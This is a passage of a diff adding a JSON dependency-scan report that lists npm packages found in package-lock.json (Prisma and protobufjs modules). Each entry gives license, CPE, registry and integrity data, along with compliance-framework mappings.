"sha512-UNjfslWhAt06kVL3CjkuYpHAWSO6L4kDCVPegV6itt7nD1kSJavd3vhgAEhjglLJJKEdJ7oIqDJ+yHk6qO8gPA==", + "dependencies": { + "@prisma/debug": "5.22.0", + "@prisma/engines-version": "5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", + "@prisma/fetch-engine": "5.22.0", + "@prisma/get-platform": "5.22.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c3ee871894c65f6a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @prisma/engines-version 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", + "title": "@prisma/engines-version 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", + "description": "Package discovered: @prisma/engines-version 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3a15a4d5b57a6a32", + "name": "@prisma/engines-version", + "version": "5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@prisma\\/engines-version:\\@prisma\\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@prisma\\/engines-version:\\@prisma\\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@prisma\\/engines_version:\\@prisma\\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@prisma\\/engines_version:\\@prisma\\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@prisma\\/engines:\\@prisma\\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@prisma\\/engines:\\@prisma\\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40prisma/engines-version@5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@prisma/engines-version/-/engines-version-5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2.tgz", + "integrity": "sha512-2PTmxFR2yHW/eB3uqWtcgRcgAbG1rwG9ZriSvQw+nnb7c4uCr3RAcGMb6/zfE88SKlC1Nj2ziUvc96Z379mHgQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "17f0b8bb58a0d4a7", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @prisma/fetch-engine 5.22.0", + "title": "@prisma/fetch-engine 5.22.0", + "description": "Package discovered: @prisma/fetch-engine 5.22.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "373747b9463a5333", + "name": "@prisma/fetch-engine", + "version": "5.22.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@prisma\\/fetch-engine:\\@prisma\\/fetch-engine:5.22.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@prisma\\/fetch-engine:\\@prisma\\/fetch_engine:5.22.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@prisma\\/fetch_engine:\\@prisma\\/fetch-engine:5.22.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@prisma\\/fetch_engine:\\@prisma\\/fetch_engine:5.22.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@prisma\\/fetch:\\@prisma\\/fetch-engine:5.22.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@prisma\\/fetch:\\@prisma\\/fetch_engine:5.22.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40prisma/fetch-engine@5.22.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@prisma/fetch-engine/-/fetch-engine-5.22.0.tgz", + "integrity": "sha512-bkrD/Mc2fSvkQBV5EpoFcZ87AvOgDxbG99488a5cexp5Ccny+UM6MAe/UFkUC0wLYD9+9befNOqGiIJhhq+HbA==", + "dependencies": { + "@prisma/debug": "5.22.0", + "@prisma/engines-version": "5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", + "@prisma/get-platform": "5.22.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d7f7c5d00389674a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @prisma/get-platform 5.22.0", + "title": "@prisma/get-platform 5.22.0", + "description": "Package discovered: @prisma/get-platform 5.22.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "35191eb100a1fadc", + "name": "@prisma/get-platform", + "version": "5.22.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@prisma\\/get-platform:\\@prisma\\/get-platform:5.22.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@prisma\\/get-platform:\\@prisma\\/get_platform:5.22.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@prisma\\/get_platform:\\@prisma\\/get-platform:5.22.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@prisma\\/get_platform:\\@prisma\\/get_platform:5.22.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@prisma\\/get:\\@prisma\\/get-platform:5.22.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@prisma\\/get:\\@prisma\\/get_platform:5.22.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40prisma/get-platform@5.22.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@prisma/get-platform/-/get-platform-5.22.0.tgz", + "integrity": "sha512-pHhpQdr1UPFpt+zFfnPazhulaZYCUqeIcPpJViYoq9R+D/yw4fjE+CtnsnKzPYm0ddUbeXUzjGVGIRVgPDCk4Q==", + "dependencies": { + "@prisma/debug": "5.22.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "e931437e79a085b9", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @protobufjs/aspromise 1.1.2", + "title": "@protobufjs/aspromise 1.1.2", + "description": "Package discovered: @protobufjs/aspromise 1.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "503ecf3ae2d5a446", + "name": "@protobufjs/aspromise", + "version": "1.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@protobufjs\\/aspromise:\\@protobufjs\\/aspromise:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40protobufjs/aspromise@1.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@protobufjs/aspromise/-/aspromise-1.1.2.tgz", + "integrity": "sha512-j+gKExEuLmKwvz3OgROXtrJ2UG2x8Ch2YZUxahh+s1F2HZ+wAceUNLkvy6zKCPVRkU++ZWQrdxsUeQXmcg4uoQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "e4bf388f995dc845", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @protobufjs/base64 1.1.2", + "title": "@protobufjs/base64 1.1.2", + "description": "Package discovered: @protobufjs/base64 1.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "493d13966d12b3a0", + "name": "@protobufjs/base64", + "version": "1.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@protobufjs\\/base64:\\@protobufjs\\/base64:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40protobufjs/base64@1.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@protobufjs/base64/-/base64-1.1.2.tgz", + "integrity": "sha512-AZkcAA5vnN/v4PDqKyMR5lx7hZttPDgClv83E//FMNhR2TMcLUhfRUBHCmSl0oi9zMgDDqRUJkSxO3wm85+XLg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "fad1d6a5684086d4", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @protobufjs/codegen 2.0.5", + "title": "@protobufjs/codegen 2.0.5", + "description": "Package discovered: @protobufjs/codegen 2.0.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "12a6d95fe5a62fc1", + "name": "@protobufjs/codegen", + "version": "2.0.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@protobufjs\\/codegen:\\@protobufjs\\/codegen:2.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40protobufjs/codegen@2.0.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@protobufjs/codegen/-/codegen-2.0.5.tgz", + "integrity": "sha512-zgXFLzW3Ap33e6d0Wlj4MGIm6Ce8O89n/apUaGNB/jx+hw+ruWEp7EwGUshdLKVRCxZW12fp9r40E1mQrf/34g==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "efbb149e9a326e2c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @protobufjs/eventemitter 1.1.0", + "title": "@protobufjs/eventemitter 1.1.0", + "description": "Package discovered: @protobufjs/eventemitter 1.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "7097fcb2aeb00411", + "name": "@protobufjs/eventemitter", + "version": "1.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@protobufjs\\/eventemitter:\\@protobufjs\\/eventemitter:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40protobufjs/eventemitter@1.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@protobufjs/eventemitter/-/eventemitter-1.1.0.tgz", + "integrity": "sha512-j9ednRT81vYJ9OfVuXG6ERSTdEL1xVsNgqpkxMsbIabzSo3goCjDIveeGv5d03om39ML71RdmrGNjG5SReBP/Q==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "817b2c8a979dff10", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @protobufjs/fetch 1.1.0", + "title": "@protobufjs/fetch 1.1.0", + "description": "Package discovered: @protobufjs/fetch 1.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "4ed2c80c8ad8c116", + "name": "@protobufjs/fetch", + "version": "1.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@protobufjs\\/fetch:\\@protobufjs\\/fetch:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40protobufjs/fetch@1.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@protobufjs/fetch/-/fetch-1.1.0.tgz", + "integrity": "sha512-lljVXpqXebpsijW71PZaCYeIcE5on1w5DlQy5WH6GLbFryLUrBD4932W/E2BSpfRJWseIL4v/KPgBFxDOIdKpQ==", + "dependencies": { + "@protobufjs/aspromise": "^1.1.1", + "@protobufjs/inquire": "^1.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a 